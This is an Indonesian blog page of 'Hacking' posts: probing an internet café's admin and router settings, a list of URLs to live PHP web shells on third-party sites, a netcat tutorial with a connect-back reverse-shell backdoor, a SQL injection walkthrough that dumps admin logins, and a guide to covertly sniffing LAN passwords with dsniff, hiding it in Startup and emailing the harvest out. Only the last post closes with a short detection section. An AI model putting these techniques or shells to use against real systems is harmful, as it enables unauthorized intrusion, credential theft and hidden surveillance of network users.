Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Iseng² di warnet ? BeX+ArtiConet DSL Router

Diposting oleh fitri-ariyanto on Sunday, November 17, 2013

--> [Sekilas Kisah]

Malam² mau pemilu bingung mau ngapain. Akhirnya aku putuskan buat ke warnet. Hmm,,skalian ada warnet baru, pengin nyobain ja.. ya buntut² cari tutorial sama chating..hehhe..maklum lah masih blom banyak yang dipikirin.. cewe pun ga punya (wakaka curhat neh…hehhe :) )

Gak tau kenapa ni warnet masih sepi², cm ada 2 client dan 3 nya aku. Waktu login personal ( kok pengen tau skuritinya ya..? ) ide konyol ini muncul dan pasti muncul stiap kali maen ke warnet hehe,..


[go to freak]

Hehe judulnya lucu.. apa artinya ? aku aja gak tau.. asal tulis aja..

Ok langsung saja,

1. ketika mu masukkin username ke personal, cek dulu apakah menu admin ada ? jika ada, mungkin kita bisa cek apa password defaultnya udah dig anti atau belom.. J.

Pilih menu Admin, masukkan password 008. jreng jreng jreng… kok ilang lagi ?wah brarti dah lumayan tu admin, passwd udah diganti. Klu kawan bruntung akan ada tampilan ini neh…

-------------------------

Sensor aja ya… J soalnya gak sempet n mungkin ga bisa di capture desktop nya… J, ada banyak setting buat klien jika saja menu Admin bisa kawan dapet. Enable Tool windows ( Task Manager, Cmd, Regedit, Control Panel ? dll) kebanyakan warnet men-disable tool tersebut, dan emang aku lagi beruntung kali ya ? bisa dapet .. heheh J. Klu udah puas sama itu, coba kluar menu admin dan login personal. Kita cek bagian yang laen..

2. login sudah sukses, mu lanjutin nge-net, chatting ? silahkan… hhehe tapi tutor ini intinya kayak pengamat security gitu dech.. heheh, tapi gua enggak lho ya…

kebetulan tadi menu / tool Windows sudah gua enable smua so, bagi yang udah dapet. Masuk command promt… ato CMD J

kita pengen tau di mana IP Address Routernya… gunakan perintah Tracert aja biar gampang ( mnurut saya lho ya..? jangan sirik J..)

contohnya lihat gambar..
-->
-->
Woow... terlihat disana.. bahwa kita men-trace yahoo.com, dan hasil trace kita melewat IP address 192.168.1.1 hehhe, dapet kan, routernya.. Coba kawan buka browser ( mozilla, opera, ato apalah) masukkan address IP tersebut..Klu saya dapat hasilnya seperti ini:


-->
-->
Oops… ada tuh, bisa lihat kan..? hehe.. hmmm gimana kalu kita tanem Trojan disana…? Heheh, biar suatu saat bisa masuk dengan leluasa…hheh ( tapi bisa gak ya….?)
Silahkan kawan experiment sendiri…
[Kesimpulan]
Dari tulisan diatas banyak banget inti dan kesimpulan yang dapet kita ambil. Bagi kawan sekalian yang pengin buka usaha warnet, jangan sepelakan hal² yang mungkin orang awam seperti saya tidak tahu.. J terutama keamanan dari jaringan tersebut, selain itu juga keamanan PC client. Untung ² kawan dapet user yang memang belum mengetahui banyak tentang computer atao newbie ( sama kaya saya..), klu dapet klient yang cerboh ? bisa ancur warnet anda.. jika anda yang mem-praktekkan, jangan iseng sama usaha orang, panggil adminnya, kasih tau klu ada yang gak beres sama skuritinya…
[Nambah]
Bagi yang udah master, cm pengin pesen.. maklum tulisan newbie so maaf klu udah basi. J hanya pengin share saja kok. Lagian Gua kan juga pengin usaha warnet .. hehehe
[Penutup]
Thanks to :
Warnet xxxxxx yang deket sama Papyros, ( tempat maen PS 2idaman gua)
Makasih udah gua uji coba.. J laen kali jangan sampe dapet user kaya saya..hehehe…
Special:
Allah SWT, atas karunia Nya. dan Rasulullah SAW.
SiNus Solo Ang. 2007
xcode, echo, jasakom, dll
Dan kawan sekalian yang nyempetin baca tulisan ini.
More aboutIseng² di warnet ? BeX+ArtiConet DSL Router

Here's that FBI Firefox Exploit for You (CVE-2013-1690)

Diposting oleh fitri-ariyanto

Hello fellow hackers,

I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you.  During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography. The security community was amazing: within hours, we found more information such as brief analysis about the payload, simplified PoC, bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability.


More aboutHere's that FBI Firefox Exploit for You (CVE-2013-1690)

PHP Shell

Diposting oleh fitri-ariyanto on Monday, May 11, 2009

Why is it that we have a site that we can hack the remote? Perhaps one of the few activities we can do with exploitation or remote file / server with shell code.
hmm, the following shell code for exploitation that may be used.


http://allplayoffs.com/~willboar/c100.php
-----------
http://asiahardon.com/~willboar/c100.php
-----------
http://ygbai.com/~willboar/c100.php
-----------
http://4-phonecard.com/~willboar/c100.php
-----------
http://afilmase.com/~willboar/c100.php
-----------
http://allplayoffs.com/~willboar/c100.php
-----------
http://asiahardon.com/~willboar/c100.php
-----------
http://afilmase.com/~willboar/c100.php
-----------
http://ygbai.com/~willboar/c100.php
-----------
http://4-phonecard.com/~willboar/c100.php
-----------
http://xxxwebreview.com/~willboar/c100.php
-----------
http://www.shellc0der.com/c100.txt
-----------
http://www.shellc0der.com/c99.txt
-----------
http://www.shellc0der.com/r57.txt
-----------
http://www.shellc0der.com/r58.txt
-----------
http://www.shellc0der.com/phpshell.txt
-----------
http://www.shellc0der.com/c99v2.txt
More aboutPHP Shell

Tutorial Hacking Netcat

Diposting oleh fitri-ariyanto on Monday, January 26, 2009

Mengutip bagian history pada Manual Netcat atau disingkat "nc"

"The nc utility, a "damn useful little backend utility" begun 950915 or thereabouts, as *Hobbit*'s first real stab at some sockets programming. Something that should have and indeed may have existed ten years ago, but never became a standard Unix utility. IMHO, nc could take its place right next to cat, cp, rm, mv, dd, ls, and all those other cryptic and Unix-like things."

Hacker Administrator sepertinya senang sekali menggunakan tool yang satu ini untuk melakukan scanning, koneksi port, bahkan melakukan tranfer informasi antar host.

Untuk memperolehnya, Anda dapat mendownload netcat dari website packetstormsecurity.org atau FTP mirror berikut:

* ftp://coast.cs.purdue.edu/pub/tools/unix/netutils/netcat/
* ftp://ftp.cuhk.edu.hk/pub/packages/security/purdue/netutils/netcat/

Saya tidak akan membahas lebih lanjut mengenai bagaimana menginstal netcat pada sistem Anda karena ada banyak sekali manual yang tersebar di Internet tentang bagaimana mengkompail atau memperoleh binary netcat yang sesuai. Dan pada tulisan ini, saya mengkhususkan penggunaan netcat pada environment
spesifik: UNIX.

Secara sederhana, penggunaan netcat mirip dengan sebuah Telnet client, karena netcat dapat mengakses remote host mana saja dengan port apa saja (pada protokol TCP dan UDP). Sebagai contoh: untuk connect ke sebuah host bernama dubyadubya.org pada port 80, Anda cukup mengeksekusi command:

$ nc dubyadubya.org 80
Lalu tekan CTRL + C untuk exit. Jika port yang dituju terbuka, Anda dapat memberikan perintah yang Anda inginkan. Seperti:

$ nc dubyadubya.org 80
GET / HTTP/1.0 [ENTER]
[ENTER]
HTTP/1.1 200 OK
Date: Sat, 30 Apr 2005 03:29:21 GMT
Server: Apache/1.3.33 (Darwin) PHP/4.3.10
Connection: close
Content-Type: text/html
...
Netcat juga dapat digunakan sebagai tool untuk melakukan testing sebuah firewall. Yang menjadi tujuan testing adalah mencari tahu ports yang berstatus OPEN dan LISTENING.

Netcat Command Options
Sebelum lebih jauh membahas contoh penggunaan netcat, ada baiknya jika kita membahas satu-per-satu option yang tersedia dari program tersebut.
-g := gateway Tentukan source routing hop untuk koneksi-koneksi outbound.

-G := number Digunakan untuk memberikan spesifikasi source routing pointer dalam IP header.. value: 4, 8, 12, ...

-i := seconds Menentukan delay interval pengiriman packets. Sebagai contoh, jika Anda ingin netcat menunggu 5 detik untuk scanning ports, gunakan -i 5

-l := Listen mode. Jika digunakan dengan options tambahan, maka sangat dimungkinkan untuk melakukan binding ke sebuah root shell.

-n := Tidak menggunakan DNS support dan hanya menggunakan IP address saja. Sangat berguna jika DNS Anda seringkali 'lambat' dan 'bermasalah'

-o := file Membuat format hex-dump traffic ke sebuah file

-p := value Sebuah option untuk melakukan port spoofing. Jika Anda ingin sebuah packet tampak terkirim dari port 53 dari sebuah host, maka Anda akan menggunakan -p 53.

-r := Memungkinkan netcat untuk melakukan random scanning ports.

-s := address Melakukan spoofing source address dari packet. Option ini tidak dapat bekerja pada semua sistem.

-u := Secara default, netcat menggunakan protokol TCP. Dengan menggunakan option ini, netcat akan menggunakan User Datagram Protocol (UDP).

-v := Verbose mode. Gunakan -v -v untuk mendapatkan informasi yang lebih banyak.

-w := seconds Membuat netcat menunggu (dalam detik) untuk setiap respon port. Option ini biasanya dikombinasikan dengan option -z

-z := Juga disebut "zero-I/O mode", option ini memungkinkan netcat tidak menggunakan I/O dari source system. Option ini biasanya digunakan ketika memanfaatkan netcat sebagai scanner.

Examples:
Secara sederhana, untuk melakukan koneksi ke remote host, gunakan

$ nc [-options] hostname port[s] [ports] ...

sedangkan untuk listen pada koneksi inbound, gunakan

$ nc -l -p port [-options] [hostname] [port]

Sekarang, kita akan menggunakan netcat sebagai tool untuk melakukan pengecekan terhadap sebuah remote host. Jika Anda menginginkan scanning pada port 1 sampai 1024, maka perintah yang diberikan adalah

$ nc -z -w 5 -n -v 234.56.78.9 1-1024
(UNKNOWN) [234.56.78.9] 631 (?) open
(UNKNOWN) [234.56.78.9] 113 (?) open
(UNKNOWN) [234.56.78.9] 80 (?) open
(UNKNOWN) [234.56.78.9] 25 (?) open

Gunakan double verbose (-v -v) untuk mendapatkan informasi tentang ports yang tertutup (refused)...

(UNKNOWN) [234.56.78.9] 5 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 4 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 3 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 2 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 1 (?) : Connection refused

Option -z dan -w 5 digunakan agar netcat tidak melakukan binding sebuah port dan menunggu lima detik untuk setiap koneksi. Option -n digunakan untuk tidak memanfaatkan fitur DNS resolve.

Untuk target ports, Anda dapat melakukan pembatasan hanya pada port tertentu saja.

$ nc -z -w 5 -n -v 234.56.78.9 21-25, 53, 80, 110-113, 443

Anda dapat melakukan scanning UDP ports dengan menambahkan option -u

$ nc -u -z -v -n 234.56.78.9 1-65335
(UNKNOWN) [234.56.78.9] 69 (?) open
(UNKNOWN) [234.56.78.9] 514 (?) open
(UNKNOWN) [234.56.78.9] 53 (?) open

------| Advanced Examples

Pada penggunaan tingkat lanjut, netcat juga dapat digunakan sebagai tool untuk melakukan transfer file. Sebagai contoh: Anda ingin melakukan copy-transfer sebuah direktori dari host-A ke host-B. Maka yang perlu Anda lakukan adalah:

pada host-A

$ tar cvf - direktori/ | nc host-B 12345

pada host-B

$ nc -l -p 12345 | tar xvf

Anda juga dapat mengunakan netcat sebagai connect-back backdoor. :-) pada host-A, aktifkan 2 window dimana netcat dijalankan dengan LISTEN mode.
$ nc -l -p 12345 [ window-1 ]
$ nc -l -p 12346 [ window-2 ]

pada host-B (yang menjadi victim)

$ nc -v host-B 12345 | /bin/sh | nc -v host-B 12346

Pada window-1 di host-A, Anda dapat mengetikkan perintah yang akan dijalankan pada host-B, dan kemudian melihat output dari perintah yang diberikan pada window-2 di host-A.

Penutup

Netcat layaknya sebuah Swiss Army Knife, dapat menjadi tool yang sangat bermanfaat bagi mereka pada network administrator. Namun tool ini juga dapat menjadi boomerang jika dimanfaatkan oleh mereka yang punya niatan tidak baik pada resource yang kita miliki.

Referensi

[1] Hobbit, "nc (netcat) - use network sockets from the command line," Netcat Manual, 1995.

More aboutTutorial Hacking Netcat

Cara Sederhana SQL Injection MySQL v5

Diposting oleh fitri-ariyanto on Saturday, November 29, 2008

Komunitas hacker Tanah Air semakin muncul dan melahirkan Hacker-hacker muda berbakat. Berbagai site, server, tak luput dari serangan-serangan anak bangsa. Bahkan situs pemerintah Negara pun tak luput dari serangan. Dari sinilah jati diri seorang hacker akan diuji. Bahwa hacker itu tidak merusak sebuah system yang telah ia hack, bila seorang hacker adalah perusak, itu tak lain adalah seorang cracker(perusak) dan bukan hacker.
Saya sendiri bukan seorang hacker, (masih newbies.. alias orang yang pengen jadi hacker dan masih dalam tahap belajar, belajar, berlatih dan mencoba.
Viva Indonesian Hacker!
check it out!

Pertama cari targetnya. Atau gunakan link berikut biar cepet:

http://72.14.205.100/ ^_^

Misal Kita dapet yang ini:

http://site.com/vuln.php?id=1′ <- errorkita coba cari nama databasenya http://site.com/vuln.php?id=1 union all select 0 from admin


didapat nama databasenya bego

http://site.com/vuln.php?id=1 union all select 0 from information_schema.tables

belum berhasil kita cari jumlah kolomnya

http://site.com/vuln.php?id=1 order by 9/* tidak eror http://site.com/vuln.php?id=1 order by 10/*

eror maka diambil kesimpulan kolomnya berjumlah 9

http://site.com/vuln.php?id=1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

tidak didapat apa2 tambahkan (-) didepan belakang (=)

http://site.com/vuln.php?id=-1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

didapat angka 3 untuk mencari nama tabelnya, angka 3 kita ganti dengan table_name

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’/*

didapat nama tabel tblArsipuntuk mencari nama2 tabel lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 4,1/*

sampe gak ada lagi tanda yang muncul di monitormisalkan kita mendapatkan nama tabelnya adalah tbl User sekarang kita akan mencari nama2 kolomnyauntuk mencari nama tabelnya, angka 3 kita ganti dengan column_name

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’/*

didapat nama kolomnya UserNameuntuk mencari nama2 kolom lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 4,1/*

didapat nama kolom UserName, UserLogin, UserPass, UserMailsetelah dapat nama kolom dan tabelnya kita masukkan

http://site.com/vuln.php?id=-1 union all select 1,2,UserLogin,4,5,6,7,8,9 from tblUser

http://site.com/vuln.php?id=-1 union all select 1,2,UserPass,4,5,6,7,8,9 from tblUser

didapat loginnya admin didapat passnya 1234 tinggal kita cari halaman admin. Misalnya kita temukan

http://site.com/admin.php

tinggal kita masukkan aja
loginnya:admin
passwordnya:1234

author: Andr3^81

referensi
http://andr381.wordpress.com/2008/11/21/cara-sederhana-sql-injection-mysql-v5/
More aboutCara Sederhana SQL Injection MySQL v5

Hack LAN

Diposting oleh fitri-ariyanto on Tuesday, March 11, 2008

Komunikasi ethernet pada dasarnya adalah komunikasi tipe "siaran" (broadcast). Paket-paket ethernet dari mesin yang satu sebetulnya dilihat oleh setiap komputer yang tergabung dalam suatu jaringan lokal. Paket-paket ini dibuang jika alamat MAC-nya tidak cocok dengan alamat node tujuan.
Nah, dengan menggunakan software-software 'network sniffer', paket-paket ethernet (beserta isinya) yang melewati kartu ethernet tertentu tidak dibuang begitu saja, melainkan dianalisa. Banyak kegunaan sniffing, tapi di artikel ini penulis hanya membahas sniffing password dengan menggunakan program paten karangan Dug Song (www.monkey.org/~dugsong) dsniff.

dsniff aslinya
adalah software Unix, dan teman-teman yang punya Linux/BSD bisa langsung ngedownload dan compile dsniff dari http://www.monkey.org/~dugsong/dsniff). Artikel ini membahas penggunaan di
jaringan lokal berbasis Windows, sebab artikel ini ditujukan untuk pemula, dan mereka-mereka yang pingin memanen password tapi nggak punya akses ke Unix. Program dsniff ini punya spesialisasi menggarap password dari berbagai protokol, dan memformat hasil panenan dalam bentuk yang mudah dibaca.
Protokol yang bisa ditangani oleh dsniff antara lain adalah FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere NAI Sniffer, Microsoft SMB, dan Oracle SQL*Net auth info.

Penggunaan dsniff tidak begitu jauh berbeda antara versi Win32 dengan versi Unix-nya. Kelebihan yang bias dinikmati pengguna Unix saat ini adalah adanya dua program tambahan di dsniff yang membuat dsniff versi Unix lebih perkasa, mampu memanen password dari jaringan berbasis "ethernet switch" atau "active hub", jadi tidak terbatas ke jaringan "hub" saja.

Bahan-bahan/Persyaratan:
--------------------------------
LAN lokal untuk target, yang terhubung dengan menggunakan "ethernet hub" (bukan switch)
- mesin Windows 95, 98 atau ME (untuk 2000 dan XP, kamu mesti punya hak administrator di mesin yg akan digunakan untuk memanen) yang terhubung ke LAN target
- WinPCap library, download dari http://netgroup-serv.polito.it/winpcap/install/bin/WinPcap.exe
- dsniff port to Win32, download dari http://www.datanerds.net/~mike/binaries/dsniff-1.8-win32-static.tgz
(gunakan WinZip untuk nge-extract file-file .exe-nya)

Langkah2nya :
------------------

- Install WinPcap library. Doubleclick winpcap.exe dan ikuti petunjuk di layar (tinggal pencet "Next","Next","Finish")
- Extract file dsniff...tgz nya ke suatu directory (sebaiknya di bawah
C:\Windows atau tempat lain yang nggak terlalu mencurigakan - untuk artikel ini, anggap saja disimpan di C:\WINDOWS\DS)
- Mulai memanen password. Dari start menu, klik "Run", ketik "command". Pindah ke direktori tempat disimpannya dsniff ("cd \windows\ds"). dari prompt C:> tinggal ketik "dsniff".
- silakan menonton password-password milik pengguna ditampilkan di layar

Catatan:
----------
Ada kemungkinan anda harus menspesifikasikan kartu ethernet mana yang ingin disadap. Untuk melihat daftar-daftar interface yang tersedia, ketik "dsniff -D" dari prompt DOS. Anda akan melihat daftar interface yang tersedia. Jika secara default dsniff mencoba menyadap interface yang salah, gunakan "dsniff -i [ketik nama interface disini]".


Pengembangan lebih lanjut
---------------------------------

Untuk menyimpan daftar password yang terpanen ke sebuah file, tambahkan perintah "-w [namafile]" ke program dsniff. Contoh: "c:\WINDOWS\DS>dsniff -i ELNK3 -w password.db"

untuk membaca file yg dibuat dsniff, berikan perintah "-r [namafile]"
contoh: "C:\WINDOWS\DS>dsniff -r password.db"

secara opsional, jika anda ingin file hasil panen ini disimpan dalam bentuk file ASCII:
"C:\WINDOWS\DS>dsniff -r password.db > panen.txt",

panen.txt siap disajikan.

Yang lebih asyik lagi, bisa kita konfigurasikan agar usaha panen kita tetap berjalan walaupun komputer tersebut di-reboot.Caranya gampang. Mula-mula download dulu program "start minimized" (sm.exe) dari http://www.ethernal.org/List-Archives/curves-kiddies-0010/msg00029.html. Simpan program ini di
C:\WINDOWS. Kemudian kita bikin batch file yang bisa dijalankan dari command prompt. Gunakan Notepad atau "edit" untuk membuat file ini, dan sebagai isi:
@echo off
sm /hidden c:\windows\ds\dsniff.exe -w > password.db

(tambahkan perintah opsional seperti "-i ELNK3" jika perlu)

Nah, simpan file ini (sebagai "ds.bat", misalnya), dan pindahkan file ini ke folder "Startup" lewat Start menu supaya tiap kali komputer di-restart, program dsniff kita dijalankan juga, siap untuk memanen. Program "sm" diatas berfungsi menjalankan program secara tersembunyi supaya tidak mencurigakan.
Tentu saja, biar lebih nggak mencurigakan lagi, rubah nama dsniff.exe ke nama lain, dan jangan lupa ngeganti perintah "dsniff" dengan nama yang baru di semua command dan batch file.
Sekarang anda bisa tinggalkan komputer tersebut, dan dikemudian waktu kembali lagi untuk memeriksa sejauh mana hasil sadapan anda bekerja (dengan perintah "dsniff -r password.db > panen.txt" lalu "notepad panen.txt").


Membuat sadapan lebih portabel
-----------------------------
Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP) wpcap.vxd packet.dll

simpan file-file ini ke disket (ASmile, dan tinggal dibawa disketnya ke LAN target. Penjalanan perintah masih tetap sama seperti diatas, kecuali lokasi prompt nya bukan di :\WINDOWS\DS>, melainkan di A:\>.
Jika anda butuh tantangan tambahan, gunakan perintah "at" dan program pengirim email blat.exe" untuk mengirimkan hasil panenan ke alamat e-mail anonimus anda setiap jam atau bahkan setiap 5 menit. Jangan lupa bagi-bagi hasil Smile.

Tambahan-tambahan
--------------------------
Port dsniff-win32 juga mengandung beberapa utility ekstra, seperti mailsnarf (untuk membaca lalu lintas e-mail di jaringan lokal), urlsnarf (untuk membaca alamat-alamat website yang dikunjungi pengguna LAN sekitar anda), dan webspy (untuk menguntit jejak surfing mesin tertentu).

Silahkan anda coba main-main dengan utiliti-utiliti ini, penulis yakin akan ada gunanya. Harap diingat bahwa teknik diatas hanya mempan untuk LAN yang terhubung melalui "ethernet hub". Jika kebetulan LAN anda menggunakan "ethernet switch", bukan berarti nggak ada harapan. Pengguna versi
Unix-nya dsniff bisa cengar-cengir, sebab paket dsniff versi Unix mengandung dua program tambahan: arpspoof (untuk 'menipu' mesin-mesin lain agar mengirimkan paket ke mesin anda) dan macof (untuk membanjiri "switch" lokal dengan alamat-alamat MAC acak, biasanya berakibat "ethernet switch"
yang ditargetkan menjadi bingung dan mengubah mode menjadi default, bertingkah laku seperti "ethernet hub").

Deteksi, Pencegahan, dan Penanggulangan
--------------------------------------------------
Sebagai admin, anda bisa mendeteksi kartu-kartu ethernet di LAN anda yang menjalankan dsniff (dan progarm-program sejenis dsniff) karena secara prinsip, untuk meng-capture paket-paket, interface ybs harus berada dalam mode "promiscous". Jadwalkan program-program ini untuk berjalan setiap 5 menit, dan konfigurasikan agar komputer pendeteksi mengemail anda jika ada aktifitas-aktifitas mencurigakan.
Utiliti yang bisa anda gunakan termasuk "promisc", "CPM", "ifstatus", atau yang lebih yahud lagi, utilitas buatan grup hacking Portugal The Apostols yang bernama "NePED" (http://metalab.unc.edu/pub/Linux/distributions/trinux/src/neped.c). Untuk platform Windows, tersedia produk-produk komersil seperti LANGuard/LANSniffer atau AntiSniff dari L0pht Heavy Industry (http://www.l0pht.com/antisniff). Diantara produk-produk diatas, sebagian besar hanyalah bisa mendeteksi adanya sniffer jika dijalankan di mesin lokal. Untuk mendeteksi network secara remote, gunakan NePED atau AntiSniff.

Jika anda punya budget, beli switch ethernet yang nggak nge-default ke "hub mode" kalau di-flood alamat-alamat MAC palsu. Kalau anda nggak ngerti, harap ngambil kursus "Pengenalan TCP/IP" atau berhenti jadi admin. Juga harap ingat bahwa banyak perusahaan-perusahaan yang mengklaim menjual hub yang tak bisa disadap, tapi ternyata hanya menjual hub tipe "active huub" yang biasanya tidak bisa menghandel traffic Fast Ethernet (100 Mbps).

Cara paling handal untuk mencegah bocornya informasi sensitif lewat network adalah dengan menggunakan enkripsi. Pakailah SSH, SCP (pengganti FTP) atau SFTP, TLS (untuk memeriksa e-mail), SSL dan HTTPS (untuk transaksi web), tunelling, dll. Usahakan agar jangan sampai ada program yang mengirimkan password tanpa enkripsi melalui jaringan yang anda kelola. Juga selalu periksa keadaan hard disk anda.
Seringkali sniffer-sniffer meninggalkan jejak berupa file hasil panenan yang berukuran besar (apalagi jika LANnya sibuk).

Cara lain mengamankan network anda adalah dengan memindahkan topologi jaringan anda ke sistem token ring, _dan_ menggunakan kartu-kartu ethernet Token-Ring buatan IBM (iklan sabun colexz). Tapi tentunya metode ini tidaklah praktis bagi anda yang ingin tetap menggunakan topologi star atau hybrid.
More aboutHack LAN